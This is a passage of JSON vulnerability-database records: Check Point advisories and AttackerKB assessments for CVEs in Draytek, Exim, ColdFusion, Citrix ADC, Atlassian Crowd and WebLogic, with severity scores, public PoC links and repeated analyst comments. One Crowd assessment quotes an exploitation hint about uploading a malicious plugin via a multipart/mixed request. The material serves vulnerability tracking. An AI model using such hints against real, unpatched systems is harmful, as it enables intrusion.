"CPAI-2015-1321", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-14T18:11:37", "description": "A command injection vulnerability exists in Draytek Vigor. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-07T00:00:00", "type": "checkpoint_advisories", "title": "Draytek Vigor Command Injection (CVE-2020-8515)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2022-11-14T00:00:00", "id": "CPAI-2020-0320", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:18:18", "description": "A buffer overflow vulnerability exists in Exim Mail Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system or cause application crashes.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "checkpoint_advisories", "title": "Exim Mail Server Buffer Overflow (CVE-2018-6789)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6789"], "modified": "2020-10-21T00:00:00", "id": "CPAI-2018-1694", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:26:39", "description": "An insecure deserialization vulnerability exists in the Flex integration service of Adobe ColdFusion. The vulnerability is due to the lack of input validation. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-29T00:00:00", "type": "checkpoint_advisories", "title": "Adobe ColdFusion DataServicesCFProxy Insecure Deserialization (CVE-2018-4939)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4939"], "modified": "2018-08-15T00:00:00", "id": "CPAI-2018-0772", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:33:31", "description": "A command injection vulnerability exists in Symantec Messaging Gateway. The cause of the vulnerability due to combination of an authentication bypass in LoginAction and a lack of sanitization on user input.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-03T00:00:00", "type": "checkpoint_advisories", "title": "Symantec Messaging Gateway performRestore Command Injection (CVE-2017-6327)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6327"], "modified": "2017-09-06T00:00:00", "id": "CPAI-2017-0728", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:13:23", "description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.\n\n \n**Recent assessments:** \n \n**elligottmc** at October 22, 2020 1:02pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nIt is also included in the Oct 20 NSA Advisory on vulns exploited by Chinese APTs: \n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n**gwillcox-r7** at October 20, 2020 5:54pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nIt is also included in the Oct 20 NSA Advisory on vulns exploited by Chinese APTs: \n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8196", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-07-24T00:00:00", "id": "AKB:3014CE3B-5D5F-4310-AB9F-3023E9B7126C", "href": "https://attackerkb.com/topics/r0FRieLWQM/cve-2020-8196", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-10-18T16:43:03", "description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.\n\n \n**Recent assessments:** \n \n**mekhalleh** at July 12, 2020 6:17pm UTC reported:\n\nFull details are here : <https://dmaasland.github.io/posts/citrix.html>\n\nPublic reporting on July 8th, 2020 by Donny Maasland discussed how the vulnerability could be exploited.\n\nAs of July 10th, RIFT has confirmed that this vulnerability can be used to extract valid VPN sessions from a vulnerable instance (cf. <https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/>).\n\nI write quicly a metasploit auxilary scanner and tested on netscaler 12.1 build 57.18 (<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>)\n\n**gwillcox-r7** at October 20, 2020 5:52pm UTC reported:\n\nFull details are here : <https://dmaasland.github.io/posts/citrix.html>\n\nPublic reporting on July 8th, 2020 by Donny Maasland discussed how the vulnerability could be exploited.\n\nAs of July 10th, RIFT has confirmed that this vulnerability can be used to extract valid VPN sessions from a vulnerable instance (cf. <https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/>).\n\nI write quicly a metasploit auxilary scanner and tested on netscaler 12.1 build 57.18 (<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>)\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8193", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2023-10-07T00:00:00", "id": "AKB:EF56F4A3-B95C-4CA0-9E19-BA58E1295785", "href": "https://attackerkb.com/topics/1F4m9YYhx2/cve-2020-8193", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-20T20:13:22", "description": "Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.\n\n \n**Recent assessments:** \n \n**elligottmc** at October 22, 2020 12:59pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nAlso, as mentioned by **@gwillcox-r7** already, it is included in the Oct 20 NSA advisory.\n\n**gwillcox-r7** at October 20, 2020 5:53pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nAlso, as mentioned by **@gwillcox-r7** already, it is included in the Oct 20 NSA advisory.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8195", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-07-24T00:00:00", "id": "AKB:43680748-EEC0-4395-9572-2A3534D61D88", "href": "https://attackerkb.com/topics/rSz4fDlp1Z/cve-2020-8195", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-12T22:50:36", "description": "Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-03T00:00:00", "type": "attackerkb", "title": "CVE-2019-11580", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-07-24T00:00:00", "id": "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "href": "https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:32:31", "description": "Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 15, 2019 5:39pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\n**busterb** at August 13, 2019 6:10pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-13T00:00:00", "type": "attackerkb", "title": "Atlassian Crowd: pdkinstall development plugin incorrectly enabled (CVE-2019-11580)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-02-13T00:00:00", "id": "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "href": "https://attackerkb.com/topics/BriLAQlFp1/atlassian-crowd-pdkinstall-development-plugin-incorrectly-enabled-cve-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:39", "description": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. NOTE: the scope of this CVE is limited to the WebLogic Server product.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:52pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2015-11-18T00:00:00", "type": "attackerkb", "title": "CVE-2015-4852", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852"], "modified": "2020-07-30T00:00:00", "id": "AKB:71A48C9F-C37B-4C1A-AD30-456EF1B66CF9", "href": "https://attackerkb.com/topics/UBKuPZwldv/cve-2015-4852", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:40", "description": "Adobe ColdFusion Update 5 and earlier versions, ColdFusion 11 Update 13 and earlier versions have an exploitable Deserialization of Untrusted Data vulnerability. Successful exploitation could lead to arbitrary code execution.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:50pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", 